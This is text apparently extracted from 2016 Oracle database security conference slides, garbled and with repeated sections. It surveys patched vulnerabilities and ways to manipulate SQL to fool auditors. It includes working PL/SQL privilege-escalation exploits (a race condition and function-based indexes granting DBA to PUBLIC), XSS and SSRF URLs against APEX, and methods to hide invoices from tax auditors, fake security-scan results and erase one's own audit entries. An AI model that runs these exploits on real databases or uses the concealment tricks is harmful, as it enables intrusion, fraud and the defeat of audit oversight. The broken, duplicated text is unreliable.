Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
2016
January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield)
DB Database Assessment Tool
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html httpwwwdavidlitchfieldcomExploitingtheOracleWorkspaceManagerSQLRaceConditionpdf httpsgithubcomfoospidyDbDat
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield)
DB Database Assessment Tool
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html httpwwwdavidlitchfieldcomExploitingtheOracleWorkspaceManagerSQLRaceConditionpdf httpsgithubcomfoospidyDbDat
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
